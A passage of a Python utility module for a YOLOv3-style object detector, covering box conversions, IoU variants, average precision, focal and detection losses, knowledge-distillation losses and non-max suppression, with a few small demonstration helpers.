y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y
return y
# def xywh2xyxy(box):
# # Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2]
# if isinstance(box, torch.Tensor):
# x, y, w, h = box.t()
# return torch.stack((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).t()
# else: # numpy
# x, y, w, h = box.T
# return np.stack((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).T
#
#
# def xyxy2xywh(box):
# # Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h]
# if isinstance(box, torch.Tensor):
# x1, y1, x2, y2 = box.t()
# return torch.stack(((x1 + x2) / 2, (y1 + y2) / 2, x2 - x1, y2 - y1)).t()
# else: # numpy
# x1, y1, x2, y2 = box.T
# return np.stack(((x1 + x2) / 2, (y1 + y2) / 2, x2 - x1, y2 - y1)).T
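# Editor's illustrative sketch (hypothetical helper, not part of the original module): round-trips a
# couple of boxes through xywh2xyxy() and xyxy2xywh() above; both accept numpy arrays or torch tensors.
def _demo_box_format_roundtrip():
    boxes_xywh = torch.tensor([[50., 50., 20., 10.],   # centre (50, 50), 20 wide, 10 tall
                               [10., 20., 4., 8.]])
    boxes_xyxy = xywh2xyxy(boxes_xywh)                 # [[40, 45, 60, 55], [8, 16, 12, 24]]
    assert torch.allclose(xyxy2xywh(boxes_xyxy), boxes_xywh)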
def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None):
# Rescale coords (xyxy) from img1_shape to img0_shape
if ratio_pad is None: # calculate from img0_shape
gain = max(img1_shape) / max(img0_shape) # gain = old / new
pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding
else:
gain = ratio_pad[0][0]
pad = ratio_pad[1]
coords[:, [0, 2]] -= pad[0] # x padding
coords[:, [1, 3]] -= pad[1] # y padding
coords[:, :4] /= gain
clip_coords(coords, img0_shape)
return coords
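# Editor's illustrative sketch (hypothetical helper, not part of the original module): maps a detection
# from a 416x416 letterboxed input back to a 1280x720 source frame. Shapes are (height, width), boxes
# are xyxy, and scale_coords() mutates the tensor in place as well as returning it.
def _demo_scale_coords():
    det = torch.tensor([[100., 141., 200., 241.]])  # box in 416x416 network coordinates
    scale_coords((416, 416), det, (720, 1280))
    print(det)  # roughly [[307.7, 153.8, 615.4, 461.5]] in original-image pixels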
def clip_coords(boxes, img_shape):
    # Clip xyxy bounding boxes to image shape (height, width)
boxes[:, 0].clamp_(0, img_shape[1]) # x1
boxes[:, 1].clamp_(0, img_shape[0]) # y1
boxes[:, 2].clamp_(0, img_shape[1]) # x2
boxes[:, 3].clamp_(0, img_shape[0]) # y2
def ap_per_class(tp, conf, pred_cls, target_cls):
""" Compute the average precision, given the recall and precision curves.
Source: https://github.com/rafaelpadilla/Object-Detection-Metrics.
# Arguments
tp: True positives (nparray, nx1 or nx10).
conf: Objectness value from 0-1 (nparray).
pred_cls: Predicted object classes (nparray).
target_cls: True object classes (nparray).
# Returns
The average precision as computed in py-faster-rcnn.
"""
# Sort by objectness
i = np.argsort(-conf)
tp, conf, pred_cls = tp[i], conf[i], pred_cls[i]
# Find unique classes
unique_classes = np.unique(target_cls)
# Create Precision-Recall curve and compute AP for each class
pr_score = 0.1 # score to evaluate P and R https://github.com/ultralytics/yolov3/issues/898
s = [len(unique_classes), tp.shape[1]] # number class, number iou thresholds (i.e. 10 for mAP0.5...0.95)
ap, p, r = np.zeros(s), np.zeros(s), np.zeros(s)
for ci, c in enumerate(unique_classes):
i = pred_cls == c
n_gt = (target_cls == c).sum() # Number of ground truth objects
n_p = i.sum() # Number of predicted objects
if n_p == 0 or n_gt == 0:
continue
else:
# Accumulate FPs and TPs
fpc = (1 - tp[i]).cumsum(0)
tpc = tp[i].cumsum(0)
# Recall
recall = tpc / (n_gt + 1e-16) # recall curve
r[ci] = np.interp(-pr_score, -conf[i], recall[:, 0]) # r at pr_score, negative x, xp because xp decreases
# Precision
precision = tpc / (tpc + fpc) # precision curve
p[ci] = np.interp(-pr_score, -conf[i], precision[:, 0]) # p at pr_score
# AP from recall-precision curve
for j in range(tp.shape[1]):
ap[ci, j] = compute_ap(recall[:, j], precision[:, j])
# Plot
# fig, ax = plt.subplots(1, 1, figsize=(5, 5))
# ax.plot(recall, precision)
# ax.set_xlabel('Recall')
# ax.set_ylabel('Precision')
# ax.set_xlim(0, 1.01)
# ax.set_ylim(0, 1.01)
# fig.tight_layout()
# fig.savefig('PR_curve.png', dpi=300)
# Compute F1 score (harmonic mean of precision and recall)
f1 = 2 * p * r / (p + r + 1e-16)
return p, r, ap, f1, unique_classes.astype('int32')
def compute_ap(recall, precision):
""" Compute the average precision, given the recall and precision curves.
Source: https://github.com/rbgirshick/py-faster-rcnn.
# Arguments
recall: The recall curve (list).
precision: The precision curve (list).
# Returns
The average precision as computed in py-faster-rcnn.
"""
# Append sentinel values to beginning and end
mrec = np.concatenate(([0.], recall, [min(recall[-1] + 1E-3, 1.)]))
mpre = np.concatenate(([0.], precision, [0.]))
# Compute the precision envelope
mpre = np.flip(np.maximum.accumulate(np.flip(mpre)))
# Integrate area under curve
method = 'interp' # methods: 'continuous', 'interp'
if method == 'interp':
x = np.linspace(0, 1, 101) # 101-point interp (COCO)
ap = np.trapz(np.interp(x, mrec, mpre), x) # integrate
else: # 'continuous'
i = np.where(mrec[1:] != mrec[:-1])[0] # points where x axis (recall) changes
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1]) # area under curve
return ap
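# Editor's illustrative sketch (hypothetical helper, not part of the original module): evaluates
# compute_ap() on a hand-made precision-recall curve; the result is the area under the interpolated
# precision envelope (roughly 0.61 for this curve).
def _demo_compute_ap():
    recall = np.array([0.1, 0.4, 0.8])
    precision = np.array([1.0, 0.75, 0.5])
    print('AP = %.3f' % compute_ap(recall, precision))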
def bbox_iou(box1, box2, x1y1x2y2=True, GIoU=False, DIoU=False, CIoU=False):
# Returns the IoU of box1 to box2. box1 is 4, box2 is nx4
box2 = box2.t()
# Get the coordinates of bounding boxes
if x1y1x2y2: # x1, y1, x2, y2 = box1
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
else: # transform from xywh to xyxy
b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2
b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2
b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2
b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2
# Intersection area
inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \
(torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0)
# Union Area
w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1
w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1
union = (w1 * h1 + 1e-16) + w2 * h2 - inter
iou = inter / union # iou
if GIoU or DIoU or CIoU:
cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1) # convex (smallest enclosing box) width
ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) # convex height
if GIoU: # Generalized IoU https://arxiv.org/pdf/1902.09630.pdf
c_area = cw * ch + 1e-16 # convex area
return iou - (c_area - union) / c_area # GIoU
if DIoU or CIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1
# convex diagonal squared
c2 = cw ** 2 + ch ** 2 + 1e-16
# centerpoint distance squared
rho2 = ((b2_x1 + b2_x2) - (b1_x1 + b1_x2)) ** 2 / 4 + ((b2_y1 + b2_y2) - (b1_y1 + b1_y2)) ** 2 / 4
if DIoU:
return iou - rho2 / c2 # DIoU
elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47
v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)
with torch.no_grad():
alpha = v / (1 - iou + v)
return iou - (rho2 / c2 + v * alpha) # CIoU
return iou
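# Editor's illustrative sketch (hypothetical helper, not part of the original module): compares plain IoU
# and GIoU for one reference box against two candidates (xyxy format). GIoU also penalises the empty area
# of the smallest enclosing box, so it can go negative for badly aligned pairs.
def _demo_bbox_iou():
    ref = torch.tensor([0., 0., 10., 10.])
    cands = torch.tensor([[5., 5., 15., 15.],
                          [0., 0., 10., 10.]])
    print(bbox_iou(ref, cands))             # ~[0.143, 1.000]
    print(bbox_iou(ref, cands, GIoU=True))  # ~[-0.079, 1.000]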
def box_iou(box1, box2):
# https://github.com/pytorch/vision/blob/master/torchvision/ops/boxes.py
"""
Return intersection-over-union (Jaccard index) of boxes.
Both sets of boxes are expected to be in (x1, y1, x2, y2) format.
Arguments:
box1 (Tensor[N, 4])
box2 (Tensor[M, 4])
Returns:
iou (Tensor[N, M]): the NxM matrix containing the pairwise
IoU values for every element in boxes1 and boxes2
"""
def box_area(box):
# box = 4xn
return (box[2] - box[0]) * (box[3] - box[1])
area1 = box_area(box1.t())
area2 = box_area(box2.t())
# inter(N,M) = (rb(N,M,2) - lt(N,M,2)).clamp(0).prod(2)
inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)
return inter / (area1[:, None] + area2 - inter) # iou = inter / (area1 + area2 - inter)
def wh_iou(wh1, wh2):
# Returns the nxm IoU matrix. wh1 is nx2, wh2 is mx2
wh1 = wh1[:, None] # [N,1,2]
wh2 = wh2[None] # [1,M,2]
inter = torch.min(wh1, wh2).prod(2) # [N,M]
return inter / (wh1.prod(2) + wh2.prod(2) - inter) # iou = inter / (area1 + area2 - inter)
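# Editor's illustrative sketch (hypothetical helper, not part of the original module): width-height IoU of
# two anchors against one target shape, as used when matching anchors during target building; boxes are
# compared as if they shared a centre, so only the shapes matter.
def _demo_wh_iou():
    anchors = torch.tensor([[10., 13.], [30., 61.]])
    target_wh = torch.tensor([[12., 12.]])
    print(wh_iou(anchors, target_wh))  # ~[[0.78], [0.08]] -> the small anchor is the better match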
class FocalLoss(nn.Module):
# Wraps focal loss around existing loss_fcn(), i.e. criteria = FocalLoss(nn.BCEWithLogitsLoss(), gamma=1.5)
def __init__(self, loss_fcn, gamma=1.5, alpha=0.25):
super(FocalLoss, self).__init__()
self.loss_fcn = loss_fcn # must be nn.BCEWithLogitsLoss()
self.gamma = gamma
self.alpha = alpha
self.reduction = loss_fcn.reduction
self.loss_fcn.reduction = 'none' # required to apply FL to each element
def forward(self, pred, true):
loss = self.loss_fcn(pred, true)
# p_t = torch.exp(-loss)
# loss *= self.alpha * (1.000001 - p_t) ** self.gamma # non-zero power for gradient stability
# TF implementation https://github.com/tensorflow/addons/blob/v0.7.1/tensorflow_addons/losses/focal_loss.py
pred_prob = torch.sigmoid(pred) # prob from logits
p_t = true * pred_prob + (1 - true) * (1 - pred_prob)
alpha_factor = true * self.alpha + (1 - true) * (1 - self.alpha)
modulating_factor = (1.0 - p_t) ** self.gamma
loss *= alpha_factor * modulating_factor
if self.reduction == 'mean':
return loss.mean()
elif self.reduction == 'sum':
return loss.sum()
else: # 'none'
return loss
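# Editor's illustrative sketch (hypothetical helper, not part of the original module): wraps an ordinary
# BCEWithLogitsLoss in FocalLoss as the class comment above describes; confident, correct predictions are
# down-weighted, so the uncertain sample dominates the focal value.
def _demo_focal_loss():
    focal = FocalLoss(nn.BCEWithLogitsLoss(), gamma=1.5, alpha=0.25)
    plain = nn.BCEWithLogitsLoss()
    logits = torch.tensor([3.0, -3.0, 0.1])  # confident positive, confident negative, uncertain positive
    targets = torch.tensor([1.0, 0.0, 1.0])
    print(plain(logits, targets), focal(logits, targets))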
def smooth_BCE(eps=0.1): # https://github.com/ultralytics/yolov3/issues/238#issuecomment-598028441
# return positive, negative label smoothing BCE targets
return 1.0 - 0.5 * eps, 0.5 * eps
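# Editor's illustrative sketch (hypothetical helper, not part of the original module): the smoothed
# positive/negative targets returned here feed the cp/cn values used for classification in compute_loss().
def _demo_smooth_bce():
    cp, cn = smooth_BCE(eps=0.1)
    print(cp, cn)  # 0.95 0.05 -> positives are trained toward 0.95 instead of 1.0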
def compute_loss(p, targets, model): # predictions, targets, model
ft = torch.cuda.FloatTensor if p[0].is_cuda else torch.Tensor
lcls, lbox, lobj = ft([0]), ft([0]), ft([0])
tcls, tbox, indices, anchor_vec = build_targets(p, targets, model)
h = model.hyp # hyperparameters
red = 'mean' # Loss reduction (sum or mean)
# Define criteria
BCEcls = nn.BCEWithLogitsLoss(pos_weight=ft([h['cls_pw']]), reduction=red)
BCEobj = nn.BCEWithLogitsLoss(pos_weight=ft([h['obj_pw']]), reduction=red)
# class label smoothing https://arxiv.org/pdf/1902.04103.pdf eqn 3
cp, cn = smooth_BCE(eps=0.0)
# focal loss
g = h['fl_gamma'] # focal loss gamma
if g > 0:
BCEcls, BCEobj = FocalLoss(BCEcls, g), FocalLoss(BCEobj, g)
# Compute losses
np, ng = 0, 0 # number grid points, targets
for i, pi in enumerate(p): # layer index, layer predictions
b, a, gj, gi = indices[i] # image, anchor, gridy, gridx
tobj = torch.zeros_like(pi[..., 0]) # target obj
np += tobj.numel()
# Compute losses
nb = len(b)
if nb: # number of targets
ng += nb
ps = pi[b, a, gj, gi] # prediction subset corresponding to targets
# ps[:, 2:4] = torch.sigmoid(ps[:, 2:4]) # wh power loss (uncomment)
# GIoU
pxy = torch.sigmoid(ps[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
pwh = torch.exp(ps[:, 2:4]).clamp(max=1E3) * anchor_vec[i]
pbox = torch.cat((pxy, pwh), 1) # predicted box
giou = bbox_iou(pbox.t(), tbox[i], x1y1x2y2=False, GIoU=True) # giou computation
lbox += (1.0 - giou).sum() if red == 'sum' else (1.0 - giou).mean() # giou loss
tobj[b, a, gj, gi] = (1.0 - model.gr) + model.gr * giou.detach().clamp(0).type(tobj.dtype) # giou ratio
if model.nc > 1: # cls loss (only if multiple classes)
t = torch.full_like(ps[:, 5:], cn) # targets
t[range(nb), tcls[i]] = cp
lcls += BCEcls(ps[:, 5:], t) # BCE
# lcls += CE(ps[:, 5:], tcls[i]) # CE
# Append targets to text file
# with open('targets.txt', 'a') as file:
# [file.write('%11.5g ' * 4 % tuple(x) + '\n') for x in torch.cat((txy[i], twh[i]), 1)]
lobj += BCEobj(pi[..., 4], tobj) # obj loss
lbox *= h['giou']
lobj *= h['obj']
lcls *= h['cls']
if red == 'sum':
bs = tobj.shape[0] # batch size
lobj *= 3 / (6300 * bs) * 2 # 3 / np * 2
if ng:
lcls *= 3 / ng / model.nc
lbox *= 3 / ng
loss = lbox + lobj + lcls
return loss, torch.cat((lbox, lobj, lcls, loss)).detach()
def compute_lost_KD(output_s, output_t, num_classes, batch_size):
T = 3.0
Lambda_ST = 0.001
criterion_st = torch.nn.KLDivLoss(reduction='sum')
output_s = torch.cat([i.view(-1, num_classes + 5) for i in output_s])
output_t = torch.cat([i.view(-1, num_classes + 5) for i in output_t])
loss_st = criterion_st(nn.functional.log_softmax(output_s / T, dim=1),
nn.functional.softmax(output_t / T, dim=1)) * (T * T) / batch_size
return loss_st * Lambda_ST
def compute_lost_KD2(model, targets, output_s, output_t):
reg_m = 0.0
T = 3.0
Lambda_cls, Lambda_box = 0.0001, 0.001
criterion_st = torch.nn.KLDivLoss(reduction='sum')
ft = torch.cuda.FloatTensor if output_s[0].is_cuda else torch.Tensor
lcls, lbox = ft([0]), ft([0])
tcls, tbox, indices, anchor_vec = build_targets(output_s, targets, model)
reg_ratio, reg_num, reg_nb = 0, 0, 0
for i, (ps, pt) in enumerate(zip(output_s, output_t)): # layer index, layer predictions
b, a, gj, gi = indices[i] # image, anchor, gridy, gridx
nb = len(b)
if nb: # number of targets
pss = ps[b, a, gj, gi] # prediction subset corresponding to targets
pts = pt[b, a, gj, gi]
psxy = torch.sigmoid(pss[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
psbox = torch.cat((psxy, torch.exp(pss[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
ptxy = torch.sigmoid(pts[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
ptbox = torch.cat((ptxy, torch.exp(pts[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
l2_dis_s = (psbox - tbox[i]).pow(2).sum(1)
l2_dis_s_m = l2_dis_s + reg_m
l2_dis_t = (ptbox - tbox[i]).pow(2).sum(1)
l2_num = l2_dis_s_m > l2_dis_t
lbox += l2_dis_s[l2_num].sum()
reg_num += l2_num.sum().item()
reg_nb += nb
output_s_i = ps[..., 4:].view(-1, model.nc + 1)
output_t_i = pt[..., 4:].view(-1, model.nc + 1)
lcls += criterion_st(nn.functional.log_softmax(output_s_i / T, dim=1),
nn.functional.softmax(output_t_i / T, dim=1)) * (T * T) / ps.size(0)
if reg_nb:
reg_ratio = reg_num / reg_nb
return lcls * Lambda_cls + lbox * Lambda_box, reg_ratio
def compute_lost_KD3(model, targets, output_s, output_t):
T = 3.0
Lambda_cls, Lambda_box = 0.0001, 0.001
criterion_st = torch.nn.KLDivLoss(reduction='sum')
ft = torch.cuda.FloatTensor if output_s[0].is_cuda else torch.Tensor
lcls, lbox = ft([0]), ft([0])
tcls, tbox, indices, anchor_vec = build_targets(output_s, targets, model)
for i, (ps, pt) in enumerate(zip(output_s, output_t)): # layer index, layer predictions
b, a, gj, gi = indices[i] # image, anchor, gridy, gridx
nb = len(b)
if nb: # number of targets
pss = ps[b, a, gj, gi] # prediction subset corresponding to targets
pts = pt[b, a, gj, gi]
psxy = torch.sigmoid(pss[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
psbox = torch.cat((psxy, torch.exp(pss[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
ptxy = torch.sigmoid(pts[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
ptbox = torch.cat((ptxy, torch.exp(pts[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
l2_dis = (psbox - ptbox).pow(2).sum(1)
lbox += l2_dis.sum()
output_s_i = ps[..., 4:].view(-1, model.nc + 1)
output_t_i = pt[..., 4:].view(-1, model.nc + 1)
lcls += criterion_st(nn.functional.log_softmax(output_s_i / T, dim=1),
nn.functional.softmax(output_t_i / T, dim=1)) * (T * T) / ps.size(0)
return lcls * Lambda_cls + lbox * Lambda_box
def compute_lost_KD4(model, targets, output_s, output_t, feature_s, feature_t, batch_size):
T = 3.0
Lambda_cls, Lambda_box, Lambda_feature = 0.0001, 0.001, 0.001
criterion_st = torch.nn.KLDivLoss(reduction='sum')
criterion_stf = torch.nn.KLDivLoss(reduction='mean')
ft = torch.cuda.FloatTensor if output_s[0].is_cuda else torch.Tensor
lcls, lbox, lfeature = ft([0]), ft([0]), ft([0])
tcls, tbox, indices, anchor_vec = build_targets(output_s, targets, model)
for i, (ps, pt) in enumerate(zip(output_s, output_t)): # layer index, layer predictions
b, a, gj, gi = indices[i] # image, anchor, gridy, gridx
nb = len(b)
if nb: # number of targets
pss = ps[b, a, gj, gi] # prediction subset corresponding to targets
pts = pt[b, a, gj, gi]
psxy = torch.sigmoid(pss[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
psbox = torch.cat((psxy, torch.exp(pss[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
ptxy = torch.sigmoid(pts[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
ptbox = torch.cat((ptxy, torch.exp(pts[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
l2_dis = (psbox - ptbox).pow(2).sum(1)
lbox += l2_dis.sum()
# cls loss
output_s_i = ps[..., 4:].view(-1, model.nc + 1)
output_t_i = pt[..., 4:].view(-1, model.nc + 1)
lcls += criterion_st(nn.functional.log_softmax(output_s_i / T, dim=1),
nn.functional.softmax(output_t_i / T, dim=1)) * (T * T) / ps.size(0)
# feature loss
if len(feature_t) != len(feature_s):
print("feature mismatch!")
exit()
for i in range(len(feature_t)):
# feature_t[i] = feature_t[i].pow(2).sum(1)
feature_t[i] = feature_t[i].abs().sum(1)
# feature_s[i] = feature_s[i].pow(2).sum(1)
feature_s[i] = feature_s[i].abs().sum(1)
lfeature += criterion_stf(nn.functional.log_softmax(feature_s[i] / T),
nn.functional.softmax(feature_t[i] / T)) * (T * T) / batch_size
return lcls * Lambda_cls + lbox * Lambda_box + lfeature * Lambda_feature
def indices_merge(indices):
indices_merge = []
for i in range(len(indices)):
temp = list(indices[i])
temp[2] = temp[2] * (2 ** (5 - i))
temp[3] = temp[3] * (2 ** (5 - i))
indices_merge.append(temp)
return indices_merge
def fine_grained_imitation_feature_mask(feature_s, feature_t, indices, img_size):
if feature_t.size() != feature_s.size():
print("feature mismatch!")
exit()
B, Gj, Gi = torch.Tensor(0).long().cuda(), torch.Tensor(0).long().cuda(), torch.Tensor(0).long().cuda()
feature_size = feature_s.size()[1]
scale = img_size / feature_size
for j in range(len(indices)):
if 2 ** (5 - j) < scale:
break
b, _, gj, gi = indices[j] # image, gridy, gridx
gj, gi = (gj / scale).long(), (gi / scale).long()
for i in range(gj.size()[0]):
if 2 ** (5 - j) == scale:
break
b_temp = (torch.ones(int(2 ** (5 - j) / scale - 1)) * b[i]).long().cuda()
gj_temp = torch.arange(int(gj[i].item()) + 1, int(gj[i].item() + 2 ** (5 - j) / scale)).cuda()
gi_temp = torch.arange(int(gi[i].item()) + 1, int(gi[i].item() + 2 ** (5 - j) / scale)).cuda()
b = torch.cat((b, b_temp))
gj = torch.cat((gj, gj_temp))
gi = torch.cat((gi, gi_temp))
B = torch.cat((B, b))
Gj = torch.cat((Gj, gj))
Gi = torch.cat((Gi, gi))
mask = torch.zeros(feature_s.size())
mask[B, Gj, Gi] = 1
return mask
def compute_lost_KD5(model, targets, output_s, output_t, feature_s, feature_t, batch_size, img_size):
T = 3.0
Lambda_cls, Lambda_box, Lambda_feature = 0.1, 0.001, 0.1
criterion_st = torch.nn.KLDivLoss(reduction='mean')
ft = torch.cuda.FloatTensor if output_s[0].is_cuda else torch.Tensor
lcls, lbox, lfeature = ft([0]), ft([0]), ft([0])
tcls, tbox, indices, anchor_vec = build_targets(output_s, targets, model)
for i, (ps, pt) in enumerate(zip(output_s, output_t)): # layer index, layer predictions
b, a, gj, gi = indices[i] # image, anchor, gridy, gridx
nb = len(b)
if nb: # number of targets
pss = ps[b, a, gj, gi] # prediction subset corresponding to targets
pts = pt[b, a, gj, gi]
psxy = torch.sigmoid(pss[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
psbox = torch.cat((psxy, torch.exp(pss[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
ptxy = torch.sigmoid(pts[:, 0:2]) # pxy = pxy * s - (s - 1) / 2, s = 1.5 (scale_xy)
ptbox = torch.cat((ptxy, torch.exp(pts[:, 2:4]) * anchor_vec[i]), 1).view(-1, 4) # predicted box
l2_dis = (psbox - ptbox).pow(2).sum(1)
lbox += l2_dis.sum()
# cls loss
output_s_i = ps[..., 4:].view(-1, model.nc + 1)
output_t_i = pt[..., 4:].view(-1, model.nc + 1)
lcls += criterion_st(nn.functional.log_softmax(output_s_i / T, dim=1),
nn.functional.softmax(output_t_i / T, dim=1)) * (T * T) / ps.size(0)
# feature loss
if len(feature_t) != len(feature_s):
print("feature mismatch!")
exit()
merge = indices_merge(indices)
for i in range(len(feature_t)):
# feature_t[i] = feature_t[i].pow(2).sum(1)
feature_t[i] = feature_t[i].abs().sum(1)
# feature_s[i] = feature_s[i].pow(2).sum(1)
feature_s[i] = feature_s[i].abs().sum(1)
mask = fine_grained_imitation_feature_mask(feature_s[i], feature_t[i], merge, img_size)
mask = mask.to(targets.device)
feature_t[i] = (feature_t[i] * mask).view(batch_size, -1)
feature_s[i] = (feature_s[i] * mask).view(batch_size, -1)
lfeature += criterion_st(nn.functional.log_softmax(feature_s[i] / T, dim=1),
nn.functional.softmax(feature_t[i] / T, dim=1)) * (T * T) / batch_size
# print(lcls.data)
# print(lbox.data)
# print(lfeature.data)
return lcls * Lambda_cls + lbox * Lambda_box + lfeature * Lambda_feature
def fine_grained_imitation_mask(feature_s, feature_t, indices):
if len(feature_t) != len(feature_s):
print("feature mismatch!")
exit()
mask = []
for i in range(len(feature_t)):
temp = torch.zeros(feature_s[i].size())
b, a, gj, gi = indices[i] # image, anchor, gridy, gridx
temp[b, a, gj, gi] = 1
mask.append(temp)
return mask
# FineGrainedmask
def compute_lost_KD6(model, targets, output_s, output_t, batch_size):
T = 3.0
Lambda_feature = 0.001
criterion_st = torch.nn.KLDivLoss(reduction='sum')
feature_s = list(output_s)
feature_t = list(output_t)
tcls, tbox, indices, anchor_vec = build_targets(output_s, targets, model)
mask = fine_grained_imitation_mask(feature_s, feature_t, indices)
test = indices_merge(indices)
# feature loss
for i in range(len(mask)):
mask[i] = mask[i].to(targets.device)
feature_t[i] = feature_t[i] * mask[i]
feature_s[i] = feature_s[i] * mask[i]
feature_s = torch.cat([i.view(-1, 3 * (model.nc + 5)) for i in feature_s])
feature_t = torch.cat([i.view(-1, 3 * (model.nc + 5)) for i in feature_t])
lfeature = criterion_st(nn.functional.log_softmax(feature_s / T, dim=1),
nn.functional.softmax(feature_t / T, dim=1)) * (T * T) / batch_size
return lfeature * Lambda_feature
def build_targets(p, targets, model):
# targets = [image, class, x, y, w, h]
nt = targets.shape[0]
tcls, tbox, indices, av = [], [], [], []
reject, use_all_anchors = True, True
gain = torch.ones(6, device=targets.device) # normalized to gridspace gain
# m = list(model.modules())[-1]
# for i in range(m.nl):
# anchors = m.anchors[i]
multi_gpu = type(model) in (nn.parallel.DataParallel, nn.parallel.DistributedDataParallel)
for i, j in enumerate(model.yolo_layers):
# get number of grid points and anchor vec for this yolo layer
anchors = model.module.module_list[j].anchor_vec if multi_gpu else model.module_list[j].anchor_vec
# iou of targets-anchors
gain[2:] = torch.tensor(p[i].shape)[[3, 2, 3, 2]] # xyxy gain
t, a = targets * gain, []
gwh = t[:, 4:6]
if nt:
iou = wh_iou(anchors, gwh) # iou(3,n) = wh_iou(anchors(3,2), gwh(n,2))
if use_all_anchors:
na = anchors.shape[0] # number of anchors
a = torch.arange(na).view(-1, 1).repeat(1, nt).view(-1)
t = t.repeat(na, 1)
else: # use best anchor only
iou, a = iou.max(0) # best iou and anchor
# reject anchors below iou_thres (OPTIONAL, increases P, lowers R)
if reject:
j = iou.view(-1) > model.hyp['iou_t'] # iou threshold hyperparameter
t, a = t[j], a[j]
# Indices
b, c = t[:, :2].long().t() # target image, class
gxy = t[:, 2:4] # grid x, y
gwh = t[:, 4:6] # grid w, h
gi, gj = gxy.long().t() # grid x, y indices
indices.append((b, a, gj, gi))
# Box
gxy -= gxy.floor() # xy
tbox.append(torch.cat((gxy, gwh), 1)) # xywh (grids)
av.append(anchors[a]) # anchor vec
# Class
tcls.append(c)
if c.shape[0]: # if any targets
assert c.max() < model.nc, 'Model accepts %g classes labeled from 0-%g, however you labelled a class %g. ' \
'See https://github.com/ultralytics/yolov3/wiki/Train-Custom-Data' % (
model.nc, model.nc - 1, c.max())
return tcls, tbox, indices, av
def non_max_suppression(prediction, conf_thres=0.1, iou_thres=0.6, multi_label=True, classes=None, agnostic=False):
"""
Performs Non-Maximum Suppression on inference results
Returns detections with shape:
nx6 (x1, y1, x2, y2, conf, cls)
"""
# Box constraints
min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height
method = 'merge'
nc = prediction[0].shape[1] - 5 # number of classes
multi_label &= nc > 1 # multiple labels per box
output = [None] * len(prediction)
for xi, x in enumerate(prediction): # image index, image inference
# Apply conf constraint
x = x[x[:, 4] > conf_thres]
# Apply width-height constraint
x = x[((x[:, 2:4] > min_wh) & (x[:, 2:4] < max_wh)).all(1)]
# If none remain process next image
if not x.shape[0]:
continue
# Compute conf
x[..., 5:] *= x[..., 4:5] # conf = obj_conf * cls_conf
# Box (center x, center y, width, height) to (x1, y1, x2, y2)
box = xywh2xyxy(x[:, :4])
# Detections matrix nx6 (xyxy, conf, cls)
if multi_label:
i, j = (x[:, 5:] > conf_thres).nonzero().t()
x = torch.cat((box[i], x[i, j + 5].unsqueeze(1), j.float().unsqueeze(1)), 1)
else: # best class only
conf, j = x[:, 5:].max(1)
x = torch.cat((box, conf.unsqueeze(1), j.float().unsqueeze(1)), 1)
# Filter by class
if classes:
x = x[(j.view(-1, 1) == torch.tensor(classes, device=j.device)).any(1)]
# Apply finite constraint
if not torch.isfinite(x).all():
x = x[torch.isfinite(x).all(1)]
# If none remain process next image
n = x.shape[0] # number of boxes
if not n:
continue
# Sort by confidence
# if method == 'fast_batch':
# x = x[x[:, 4].argsort(descending=True)]
# Batched NMS
c = x[:, 5] * 0 if agnostic else x[:, 5] # classes
boxes, scores = x[:, :4].clone() + c.view(-1, 1) * max_wh, x[:, 4] # boxes (offset by class), scores
if method == 'merge': # Merge NMS (boxes merged using weighted mean)
i = torchvision.ops.boxes.nms(boxes, scores, iou_thres)
if 1 < n < 3E3: # update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)
try:
# weights = (box_iou(boxes, boxes).tril_() > iou_thres) * scores.view(-1, 1) # box weights
# weights /= weights.sum(0) # normalize
# x[:, :4] = torch.mm(weights.T, x[:, :4])
weights = (box_iou(boxes[i], boxes) > iou_thres) * scores[None] # box weights
